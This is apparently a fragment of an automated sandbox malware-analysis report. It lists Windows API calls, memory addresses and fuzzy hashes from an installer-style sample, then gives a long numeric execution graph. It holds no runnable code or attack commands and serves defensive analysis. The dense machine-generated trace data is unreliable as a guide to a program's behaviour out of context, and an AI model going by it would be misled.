                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                    • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                    • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                  • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                  • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                  • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                  • String ID: %02x%c$...
                                                                                                                                                                                                                                                                  • API String ID: 3065427908-1057055748
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                                                                                                                    • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                  • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                  • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                  • API String ID: 2266616436-4211696005
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                    • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425576,755723A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                  • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                                                                                                                    • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1599320355-0
                                                                                                                                                                                                                                                                  • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                                                                                                  • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                  • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                                                                                                                  • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                                                                                                                  • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                  • String ID: Version
                                                                                                                                                                                                                                                                  • API String ID: 512980652-315105994
                                                                                                                                                                                                                                                                  • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                  • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                  • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                  • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                  • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                  • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                  • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                                                                                                                  • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                                                                                                                    • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                  • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                  • String ID: !N~
                                                                                                                                                                                                                                                                  • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • Error launching installer, xrefs: 00405C74
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                  • String ID: Error launching installer
                                                                                                                                                                                                                                                                  • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                  • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                    • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                  • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                  • API String ID: 3509786178-2769509956
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                  • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                                                                                                                  • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 190613189-0
                                                                                                                                                                                                                                                                  • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                  • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

Execution Graph

Execution Coverage:3.3%
Dynamic/Decrypted Code Coverage:100%
Signature Coverage:3.5%
Total number of Nodes:2000
Total number of Limit Nodes:48
102907->102911 102908 ce655e 8 API calls 102908->102911 102909 d4fd19 102910 d4fd2b 102909->102910 102938 ce655e 102909->102938 102913 d0017b 8 API calls 102910->102913 102911->102908 102911->102909 102922 d4fce5 ___scrt_fastfail 102911->102922 102916 d4fd59 102913->102916 102918 d4fd7b 102916->102918 102941 d4fbed 8 API calls 102916->102941 102917 d4fdb8 102919 d0014b 8 API calls 102917->102919 102917->102922 102923 d4fe0c 102918->102923 102920 d4fdd2 102919->102920 102921 d0017b 8 API calls 102920->102921 102921->102922 102922->102904 102924 cebf73 8 API calls 102923->102924 102925 d4fe3e 102924->102925 102926 cebf73 8 API calls 102925->102926 102927 d4fe47 102926->102927 102928 cebf73 8 API calls 102927->102928 102935 d4fe50 102928->102935 102929 d066f8 GetStringTypeW 102929->102935 102930 d50114 102930->102917 102931 cead40 8 API calls 102931->102935 102932 ce8577 8 API calls 102932->102935 102934 d4fe0c 40 API calls 102934->102935 102935->102929 102935->102930 102935->102931 102935->102932 102935->102934 102936 d06641 39 API calls 102935->102936 102937 cebed9 8 API calls 102935->102937 102942 d06722 GetStringTypeW _strftime 102935->102942 102936->102935 102937->102935 102939 cec2c9 8 API calls 102938->102939 102940 ce6569 102939->102940 102940->102910 102941->102916 102942->102935 102977 d502aa 102943->102977 102945 d50399 __fread_nolock 102945->102645 102947 d503f3 102993 d505e9 56 API calls __fread_nolock 102947->102993 102948 d5040b 102950 d50471 102948->102950 102953 d5041b 102948->102953 102950->102945 102951 d50507 102950->102951 102952 d504a1 102950->102952 102955 d505b0 102951->102955 102956 d50510 102951->102956 102954 d504d1 102952->102954 102963 d504a6 102952->102963 102974 d50453 102953->102974 102994 d52855 10 API calls 102953->102994 102954->102945 102998 ceca5b 39 API calls 102954->102998 102955->102945 103002 cec63f 39 API calls 102955->103002 102957 d50515 102956->102957 102959 d5058d 102956->102959 102966 d5051b 102957->102966 102967 d50554 
102957->102967 102959->102945 103001 cec63f 39 API calls 102959->103001 102963->102945 102997 ceca5b 39 API calls 102963->102997 102966->102945 102999 cec63f 39 API calls 102966->102999 102967->102945 103000 cec63f 39 API calls 102967->103000 102969 d50427 102995 d52855 10 API calls 102969->102995 102972 d5043e __fread_nolock 102996 d52855 10 API calls 102972->102996 102984 d51844 102974->102984 102975->102639 102976->102643 102978 d502f7 102977->102978 102982 d502bb 102977->102982 103013 cec98d 39 API calls 102978->103013 102979 d502f5 102979->102945 102979->102947 102979->102948 102981 ce8ec0 52 API calls 102981->102982 102982->102979 102982->102981 103003 d04d98 102982->103003 102985 d5184f 102984->102985 102986 d0014b 8 API calls 102985->102986 102987 d51856 102986->102987 102988 d51883 102987->102988 102989 d51862 102987->102989 102991 d0017b 8 API calls 102988->102991 102990 d0017b 8 API calls 102989->102990 102992 d5186b ___scrt_fastfail 102990->102992 102991->102992 102992->102945 102993->102945 102994->102969 102995->102972 102996->102974 102997->102945 102998->102945 102999->102945 103000->102945 103001->102945 103002->102945 103004 d04da6 103003->103004 103005 d04e1b 103003->103005 103012 d04dcb 103004->103012 103014 d0f649 20 API calls __dosmaperr 103004->103014 103016 d04e2d 40 API calls 3 library calls 103005->103016 103008 d04e28 103008->102982 103009 d04db2 103015 d12b5c 26 API calls pre_c_initialization 103009->103015 103011 d04dbd 103011->102982 103012->102982 103013->102979 103014->103009 103015->103011 103016->103008 103018 d5193d 103017->103018 103033 d51a56 103017->103033 103019 d5195d 103018->103019 103020 d5198a 103018->103020 103023 d519a1 103018->103023 103019->103020 103025 d51971 103019->103025 103021 d0017b 8 API calls 103020->103021 103022 d5197f __fread_nolock 103021->103022 103031 d0014b 8 API calls 103022->103031 103024 d519be 103023->103024 103026 d0017b 8 API calls 103023->103026 103024->103022 103024->103025 103027 d519e5 
103024->103027 103028 d0017b 8 API calls 103025->103028 103026->103024 103029 d0017b 8 API calls 103027->103029 103028->103022 103030 d519eb 103029->103030 103036 cfc277 8 API calls 103030->103036 103031->103033 103033->102650 103034 d519f7 103037 cff9d4 WideCharToMultiByte 103034->103037 103036->103034 103038 cff9fe 103037->103038 103039 cffa35 103037->103039 103041 d0017b 8 API calls 103038->103041 103046 cffe8a 8 API calls 103039->103046 103043 cffa05 WideCharToMultiByte 103041->103043 103042 cffa29 103042->103022 103045 cffa3e 8 API calls __fread_nolock 103043->103045 103045->103042 103046->103042 103048 ce3996 ___scrt_fastfail 103047->103048 103069 ce5f32 103048->103069 103051 ce3a1c 103053 ce3a3a Shell_NotifyIconW 103051->103053 103054 d240cd Shell_NotifyIconW 103051->103054 103073 ce61a9 103053->103073 103056 ce3a50 103056->102663 103058 ce3969 103057->103058 103059 ce3919 ___scrt_fastfail 103057->103059 103058->102663 103060 ce3938 Shell_NotifyIconW 103059->103060 103060->103058 103061->102663 103063 d0017b 8 API calls 103062->103063 103064 ce7afa 103063->103064 103065 d0014b 8 API calls 103064->103065 103066 ce7b08 103065->103066 103066->102663 103067->102663 103068->102663 103070 ce5f4e 103069->103070 103071 ce39eb 103069->103071 103070->103071 103072 d25070 DestroyIcon 103070->103072 103071->103051 103103 d4d11f 42 API calls _strftime 103071->103103 103072->103071 103074 ce61c6 103073->103074 103092 ce62a8 103073->103092 103075 ce7ad5 8 API calls 103074->103075 103076 ce61d4 103075->103076 103077 d25278 LoadStringW 103076->103077 103078 ce61e1 103076->103078 103081 d25292 103077->103081 103079 ce8577 8 API calls 103078->103079 103080 ce61f6 103079->103080 103082 ce6203 103080->103082 103089 d252ae 103080->103089 103084 cebed9 8 API calls 103081->103084 103088 ce6229 ___scrt_fastfail 103081->103088 103082->103081 103083 ce620d 103082->103083 103104 ce6b7c 103083->103104 103084->103088 103090 ce628e Shell_NotifyIconW 103088->103090 103089->103088 103091 
cebf73 8 API calls 103089->103091 103101 d252f1 103089->103101 103090->103092 103093 d252d8 103091->103093 103092->103056 103122 d4a350 9 API calls 103093->103122 103096 d25310 103098 ce6b7c 8 API calls 103096->103098 103097 d252e3 103099 ce7bb5 8 API calls 103097->103099 103100 d25321 103098->103100 103099->103101 103102 ce6b7c 8 API calls 103100->103102 103123 cffe6f 51 API calls 103101->103123 103102->103088 103103->103051 103105 d257fe 103104->103105 103106 ce6b93 103104->103106 103108 d0014b 8 API calls 103105->103108 103124 ce6ba4 103106->103124 103110 d25808 _wcslen 103108->103110 103109 ce621b 103113 ce7bb5 103109->103113 103111 d0017b 8 API calls 103110->103111 103112 d25841 __fread_nolock 103111->103112 103114 ce7bc7 103113->103114 103115 d2641d 103113->103115 103139 ce7bd8 103114->103139 103149 d413c8 8 API calls __fread_nolock 103115->103149 103118 ce7bd3 103118->103088 103119 d26427 103120 d26433 103119->103120 103121 cebed9 8 API calls 103119->103121 103121->103120 103122->103097 103123->103096 103125 ce6bb4 _wcslen 103124->103125 103126 d25860 103125->103126 103127 ce6bc7 103125->103127 103129 d0014b 8 API calls 103126->103129 103134 ce7d74 103127->103134 103131 d2586a 103129->103131 103130 ce6bd4 __fread_nolock 103130->103109 103132 d0017b 8 API calls 103131->103132 103133 d2589a __fread_nolock 103132->103133 103135 ce7d85 __fread_nolock 103134->103135 103136 ce7d8a 103134->103136 103135->103130 103137 d26528 103136->103137 103138 d0017b 8 API calls 103136->103138 103138->103135 103140 ce7be7 103139->103140 103146 ce7c1b __fread_nolock 103139->103146 103141 d2644e 103140->103141 103142 ce7c0e 103140->103142 103140->103146 103143 d0014b 8 API calls 103141->103143 103144 ce7d74 8 API calls 103142->103144 103145 d2645d 103143->103145 103144->103146 103147 d0017b 8 API calls 103145->103147 103146->103118 103148 d26491 __fread_nolock 103147->103148 103149->103119 103160 d4e80e 103150->103160 103152 d4ddd4 Process32NextW 103153 d4de86 CloseHandle 
103152->103153 103159 d4ddcd 103152->103159 103153->102674 103154 cebf73 8 API calls 103154->103159 103155 ceb329 8 API calls 103155->103159 103157 ce7bb5 8 API calls 103157->103159 103159->103152 103159->103153 103159->103154 103159->103155 103159->103157 103166 ce568e 103159->103166 103208 cfe36b 41 API calls 103159->103208 103161 d4e819 103160->103161 103162 d4e830 103161->103162 103165 d4e836 103161->103165 103209 d06722 GetStringTypeW _strftime 103161->103209 103210 d0666b 39 API calls _strftime 103162->103210 103165->103159 103167 cebf73 8 API calls 103166->103167 103168 ce56a4 103167->103168 103169 cebf73 8 API calls 103168->103169 103170 ce56ac 103169->103170 103171 cebf73 8 API calls 103170->103171 103172 ce56b4 103171->103172 103173 cebf73 8 API calls 103172->103173 103174 ce56bc 103173->103174 103175 d24da1 103174->103175 103176 ce56f0 103174->103176 103177 cebed9 8 API calls 103175->103177 103178 ceacc0 8 API calls 103176->103178 103179 d24daa 103177->103179 103180 ce56fe 103178->103180 103211 cebd57 103179->103211 103182 ceadf4 8 API calls 103180->103182 103183 ce5708 103182->103183 103184 ceacc0 8 API calls 103183->103184 103186 ce5733 103183->103186 103187 ce5729 103184->103187 103185 ce5778 103189 ceacc0 8 API calls 103185->103189 103186->103185 103188 ce5754 103186->103188 103194 d24dcc 103186->103194 103191 ceadf4 8 API calls 103187->103191 103188->103185 103193 ce655e 8 API calls 103188->103193 103190 ce5789 103189->103190 103192 ce579f 103190->103192 103198 cebed9 8 API calls 103190->103198 103191->103186 103195 ce57b3 103192->103195 103200 cebed9 8 API calls 103192->103200 103196 ce5761 103193->103196 103197 ce8577 8 API calls 103194->103197 103199 ce57be 103195->103199 103202 cebed9 8 API calls 103195->103202 103196->103185 103201 ceacc0 8 API calls 103196->103201 103204 d24e8c 103197->103204 103198->103192 103203 cebed9 8 API calls 103199->103203 103205 ce57c9 103199->103205 103200->103195 103201->103185 103202->103199 103203->103205 
103204->103185 103206 ce655e 8 API calls 103204->103206 103217 cead40 8 API calls __fread_nolock 103204->103217 103205->103159 103206->103204 103208->103159 103209->103161 103210->103165 103212 cebd64 103211->103212 103213 cebd71 103211->103213 103212->103186 103214 d0014b 8 API calls 103213->103214 103215 cebd7b 103214->103215 103216 d0017b 8 API calls 103215->103216 103216->103212 103217->103204 103219 cebf73 8 API calls 103218->103219 103220 d4dc73 103219->103220 103221 cebf73 8 API calls 103220->103221 103222 d4dc7c 103221->103222 103223 cebf73 8 API calls 103222->103223 103224 d4dc85 103223->103224 103242 ce5851 103224->103242 103229 d4dcab 103231 ce568e 8 API calls 103229->103231 103230 ce6b7c 8 API calls 103230->103229 103232 d4dcbf FindFirstFileW 103231->103232 103233 d4dd4b FindClose 103232->103233 103236 d4dcde 103232->103236 103238 d4dd56 103233->103238 103234 d4dd26 FindNextFileW 103234->103236 103235 cebed9 8 API calls 103235->103236 103236->103233 103236->103234 103236->103235 103237 ce7bb5 8 API calls 103236->103237 103239 ce6b7c 8 API calls 103236->103239 103237->103236 103238->102679 103240 d4dd17 DeleteFileW 103239->103240 103240->103234 103241 d4dd42 FindClose 103240->103241 103241->103238 103254 d222d0 103242->103254 103245 ce587d 103248 ce8577 8 API calls 103245->103248 103246 ce5898 103247 cebd57 8 API calls 103246->103247 103249 ce5889 103247->103249 103248->103249 103256 ce55dc 103249->103256 103252 d4eab0 GetFileAttributesW 103253 d4dc99 103252->103253 103253->103229 103253->103230 103255 ce585e GetFullPathNameW 103254->103255 103255->103245 103255->103246 103257 ce55ea 103256->103257 103258 ceadf4 8 API calls 103257->103258 103259 ce55fe 103258->103259 103259->103252 103260->102686 103261->102690 103263 d0017b 8 API calls 103262->103263 103264 cfc209 103263->103264 103265 d0014b 8 API calls 103264->103265 103266 cfc215 103265->103266 103266->102701 103267->102699 103268->102704 103269->102726 103270->102735 103271->102726 103272->102750 
103273->102726 103274->102603 103275->102603 103276->102609 103277->102604 103278->102506 103279->102499 103280->102501 103281->102501 103299 cecf80 103282->103299 103284 cebfb5 103285 d30db6 103284->103285 103286 cebfc3 103284->103286 103287 ceb4c8 8 API calls 103285->103287 103288 d0014b 8 API calls 103286->103288 103290 d30dc1 103287->103290 103289 cebfd4 103288->103289 103291 cebf73 8 API calls 103289->103291 103292 cebfde 103291->103292 103293 cebfed 103292->103293 103294 cebed9 8 API calls 103292->103294 103295 d0014b 8 API calls 103293->103295 103294->103293 103296 cebff7 103295->103296 103307 cebe7b 39 API calls 103296->103307 103298 cec01b 103298->102415 103300 ced1c7 103299->103300 103305 cecf93 103299->103305 103300->103284 103302 cebf73 8 API calls 103302->103305 103303 ced03d 103303->103284 103305->103302 103305->103303 103308 d005b2 5 API calls __Init_thread_wait 103305->103308 103309 d00413 29 API calls __onexit 103305->103309 103310 d00568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103305->103310 103307->103298 103308->103305 103309->103305 103310->103305 103311 cef4c0 103314 cfa025 103311->103314 103313 cef4cc 103315 cfa046 103314->103315 103316 cfa0a3 103314->103316 103315->103316 103318 cf0340 207 API calls 103315->103318 103320 cfa0e7 103316->103320 103323 d53fe1 81 API calls __wsopen_s 103316->103323 103321 cfa077 103318->103321 103319 d3806b 103319->103319 103320->103313 103321->103316 103321->103320 103322 cebed9 8 API calls 103321->103322 103322->103316 103323->103319 103324 cf0ebf 103325 cf0ed3 103324->103325 103330 cf1425 103324->103330 103326 cf0ee5 103325->103326 103327 d0014b 8 API calls 103325->103327 103328 d3562c 103326->103328 103329 ceb4c8 8 API calls 103326->103329 103331 cf0f3e 103326->103331 103327->103326 103357 d51b14 8 API calls 103328->103357 103329->103326 103330->103326 103334 cebed9 8 API calls 103330->103334 103332 cf2b20 207 API calls 103331->103332 103349 cf049d ISource 103331->103349 103352 cf0376 
ISource 103332->103352 103334->103326 103335 d3632b 103361 d53fe1 81 API calls __wsopen_s 103335->103361 103336 cf1e50 40 API calls 103336->103352 103337 cf1695 103344 cebed9 8 API calls 103337->103344 103337->103349 103338 d0014b 8 API calls 103338->103352 103340 cebed9 8 API calls 103340->103352 103341 d35cdb 103348 cebed9 8 API calls 103341->103348 103341->103349 103342 d3625a 103360 d53fe1 81 API calls __wsopen_s 103342->103360 103343 cf0aae ISource 103359 d53fe1 81 API calls __wsopen_s 103343->103359 103344->103349 103347 cf1990 207 API calls 103347->103352 103348->103349 103350 d005b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 103350->103352 103351 cebf73 8 API calls 103351->103352 103352->103335 103352->103336 103352->103337 103352->103338 103352->103340 103352->103341 103352->103342 103352->103343 103352->103347 103352->103349 103352->103350 103352->103351 103353 d00413 29 API calls pre_c_initialization 103352->103353 103354 d36115 103352->103354 103356 d00568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 103352->103356 103353->103352 103358 d53fe1 81 API calls __wsopen_s 103354->103358 103356->103352 103357->103349 103358->103343 103359->103349 103360->103349 103361->103349 103362 cef4dc 103363 cecab0 207 API calls 103362->103363 103364 cef4ea 103363->103364 103365 d18782 103370 d1853e 103365->103370 103367 d187aa 103375 d1856f try_get_first_available_module 103370->103375 103372 d1876e 103389 d12b5c 26 API calls pre_c_initialization 103372->103389 103374 d186c3 103374->103367 103382 d20d04 103374->103382 103378 d186b8 103375->103378 103385 d0917b 40 API calls 2 library calls 103375->103385 103377 d1870c 103377->103378 103386 d0917b 40 API calls 2 library calls 103377->103386 103378->103374 103388 d0f649 20 API calls __dosmaperr 103378->103388 103380 d1872b 103380->103378 103387 d0917b 40 API calls 2 library calls 103380->103387 103390 d20401 103382->103390 
